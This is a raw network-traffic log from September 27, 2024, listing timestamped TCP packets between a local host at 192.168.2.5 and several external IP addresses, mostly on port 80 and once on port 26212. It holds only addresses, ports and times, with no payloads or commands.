                                                                          Sep 27, 2024 04:21:14.993838072 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.042802095 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.042819023 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.042886972 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.107345104 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.107364893 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.107377052 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.107397079 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.107450008 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.107502937 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.107739925 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.107796907 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.107903004 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.107919931 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.107971907 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.108129978 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.108177900 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.108515024 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.108530998 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.108549118 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.108565092 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.108591080 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.108706951 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.108753920 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.108875990 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.108927011 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.109606981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.109762907 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.109797001 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.109813929 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.109838963 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.109853983 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.109935999 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.109961033 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.109985113 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.110016108 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.110392094 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.110411882 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.110431910 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.110445023 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.110456944 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.110472918 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.110488892 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.110542059 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.165389061 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:15.170310974 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:15.174258947 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.174315929 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.176492929 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:15.215770960 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.215785027 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.215795994 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.215837955 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.215879917 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.228086948 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.228158951 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.228223085 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.228256941 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.228290081 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.228312016 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.228344917 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.228517056 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.228548050 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.228579998 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.228600979 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.228626966 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.228868961 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.228900909 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.228924990 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.228943110 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.228974104 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.229006052 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.229026079 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.229051113 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.229624987 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.229655981 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.229684114 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.229718924 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.229732990 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.229763031 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.229787111 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.229819059 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.229860067 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.229918957 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.230037928 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.230068922 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.230089903 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.230110884 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.230159998 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.230190992 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.230256081 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.230279922 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.230312109 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.230331898 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.230357885 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.230384111 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.230427980 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.230443001 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.230473995 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.230508089 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.230528116 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.230556965 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.231080055 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.231111050 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.231134892 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.231153011 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.231189966 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.231240988 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.231681108 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.231735945 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.231786966 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.232297897 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.232328892 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.232362032 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.232382059 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.232413054 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.232444048 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.232466936 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.232492924 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.232520103 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.232568979 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.232971907 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.233022928 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.233053923 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.233074903 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.233103991 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.233129025 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.233165979 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.233215094 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.233253002 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.233300924 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.265291929 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.265302896 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.265345097 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.265358925 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.269310951 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.269341946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.269356012 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.269386053 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.269386053 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.269457102 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.269468069 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.269474030 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.269479990 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.269490957 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.269507885 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.269550085 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.269550085 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.269551039 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.269562006 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.269618988 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.269756079 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.274327993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.274339914 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.274420977 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.281759977 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:15.281835079 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:15.283607006 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:15.288417101 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:15.305172920 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.305186033 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.305247068 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.334884882 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.334916115 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.334984064 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.335007906 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.335027933 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.335061073 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.335097075 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.335114002 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.335133076 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.335164070 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.335186958 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.335381031 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.347376108 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.347434044 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.347451925 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.347475052 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.347485065 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.347496033 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.347501993 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.347507954 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.347523928 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.347558975 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.347718000 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.347767115 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.347794056 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.347807884 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.347826958 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.347837925 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.347841978 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.347851992 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.347861052 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.347892046 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.347944021 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.347955942 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.347994089 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.348438978 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.348481894 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.348490000 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.348495007 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.348524094 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.348543882 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.348568916 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.348583937 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.348593950 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.348604918 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.348643064 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.348665953 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.348673105 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.348684072 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.348706961 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.348733902 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.349334955 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.349349976 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.349360943 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.349368095 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.349387884 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.349410057 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.349631071 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.349651098 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.349663019 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.349680901 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.349716902 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.349746943 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.349759102 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.349769115 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.349781990 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.349796057 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.349813938 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.349884987 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.349895954 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.349906921 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.349935055 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.349947929 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.350610018 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.350630999 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.350644112 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.350657940 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.350672960 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.350692034 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.350717068 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.350728035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.350739002 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.350749969 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.350763083 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.350788116 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.350795984 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.350806952 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.350843906 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.350862026 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.350907087 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.351593018 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.351603985 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.351614952 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.351644993 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.351667881 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.351670027 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.351680994 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.351691961 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.351710081 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.351726055 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.351794004 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.351804972 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.351815939 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.351825953 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.351851940 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.351864100 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.352520943 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.352533102 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.352544069 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.352570057 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.352586031 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.352596045 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.352607965 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.352654934 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.352654934 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.352690935 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.352704048 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.352715015 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.352725983 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.352737904 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.352739096 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.352766991 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.352786064 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.353398085 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.353408098 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.353452921 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.353461981 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.355741978 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.355753899 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.355763912 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:15.355798960 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.355823994 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:15.365015030 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:15.369247913 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:15.374066114 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:15.393661022 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.393676043 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.393687010 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.393743992 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.393909931 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.393920898 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.393978119 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.393994093 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.394006014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.394022942 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.394041061 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.394067049 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.394067049 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.394516945 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.394527912 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.394540071 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.394581079 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.394581079 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.394602060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.394613981 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.394625902 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.394669056 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.394669056 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:15.395469904 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.395482063 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.395493031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.395556927 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.395567894 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:15.395580053 CEST8049725185.215.113.117192.168.2.5
